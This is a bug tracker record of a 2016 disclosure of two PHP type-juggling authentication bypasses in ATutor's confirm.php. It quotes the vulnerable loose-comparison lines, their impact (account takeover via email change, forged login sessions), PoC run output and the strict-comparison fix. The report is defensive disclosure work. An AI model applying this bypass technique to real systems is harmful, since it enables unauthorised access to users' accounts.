MantisBT

View Issue Details Jump to Notes ] Related Changesets ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0005653ATutoratutor.capublic2016-03-17 16:462016-06-30 17:43
Reportermr_me 
Assigned Tomr_me 
PriorityimmediateSeveritymajorReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version2.2.1 
Target Version2.2.1Fixed in Version2.2.2 
Summary0005653: confirm.php php type juggling authentication bypass vulnerabilities
DescriptionSo, there are 2 authentication bypass vulnerabilities within the confirm.php script.

update email type juggling authentication bypass
```````````````````````````````````````````
This occurs on line 36:

if ($code == $m) {

This code is vulnerable to an authentication bypass due to the loose ==. To patch this just change the == to ===.

impact:
```````
The ability for an attacker to change the email address of any member, then the attacker can reset the password of the member via email and login, thus bypassing authentication.

2. auto login type juggling authentication bypass
```````````````````````````````````````````
This occurs on line 151:

if ($row['member_id'] != '' && isset($_REQUEST['code']) && $_REQUEST['code'] == $code)

This code is vulnerable to an authentication bypass due to the loose ==. To patch this just change the == to ===.

impact:
```````
The ability for an attacker achieve a valid session of the targeted member_id and bypass authentication.
Steps To Reproducechange the targets inside the test poc's to your servers IP

saturn:tj mr_me$ python auto-login-poc.py
(+) found a word! aaaaacr7
(+) made a total of 3238 requests
(+) this is an authenticated cookie: ATutorID=p7ebudi85goj76q2pkuerskb44; path=/ATutor/, ATutorID=ec6up2htdjrondhons16bp8cc3; path=/ATutor/, ATutorID=ec6up2htdjrondhons16bp8cc3; path=/ATutor/ <-- this is the session to use

saturn:tj mr_me$ ./update-email-poc.py sourceincite.com
(+) found a valid email! aaaaai0m@sourceincite.com
(+) made a total of 11317 requests

As you can see, the number of requests made to the server is reasonable and takes very little time for an attacker to bypass authentication.



Additional Informationhttps://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf [^]
TagsNo tags attached.
Affects versionSVN
SVN Revision#a8a8c1e..2eed42a
Attached Files? file icon auto-login-poc.py [^] (1,202 bytes) 2016-03-17 16:46
? file icon update-email-poc.py [^] (834 bytes) 2016-03-17 16:46

- Relationships

-  Notes
(0007345)
mr_me (developer)
2016-03-17 16:48

Also, please note. I do have fully automated exploits for this issue that I have combined with the zip file issues that allow full, unauthenticated, remote code execution. As you can see, these issues are quite serious.
(0007354)
greg (administrator)
2016-03-19 14:10

replaced loose with strict comparison (===)
(0007371)
greg (administrator)
2016-03-23 20:12

credit to mr_me
(0007444)
greg (administrator)
2016-06-30 17:43

Close for 2.2.2

- Related Changesets
ATutor: master 2eed42a7
Timestamp: 2016-03-19 14:08:41
Author: greg
Details ] Diff ]
5653 replaced loose with strict comparison
mod - confirm.php Diff ] File ]

- Issue History
Date Modified Username Field Change
2016-03-17 16:46 mr_me New Issue
2016-03-17 16:46 mr_me Status new => assigned
2016-03-17 16:46 mr_me Assigned To => greg
2016-03-17 16:46 mr_me File Added: auto-login-poc.py
2016-03-17 16:46 mr_me File Added: update-email-poc.py
2016-03-17 16:48 mr_me Note Added: 0007345
2016-03-19 14:10 greg SVN Revision# => a8a8c1e..2eed42a
2016-03-19 14:10 greg Note Added: 0007354
2016-03-19 14:10 greg Status assigned => resolved
2016-03-19 14:10 greg Fixed in Version => 2.2.2
2016-03-19 14:10 greg Resolution open => fixed
2016-03-23 20:11 greg Assigned To greg => mr_me
2016-03-23 20:11 greg Status resolved => assigned
2016-03-23 20:12 greg Note Added: 0007371
2016-03-23 20:12 greg Status assigned => resolved
2016-04-16 16:16 greg Changeset attached => ATutor master 2eed42a7
2016-06-30 17:43 greg Note Added: 0007444
2016-06-30 17:43 greg Status resolved => closed


Copyright © 2000 - 2017 MantisBT Team
Powered by Mantis Bugtracker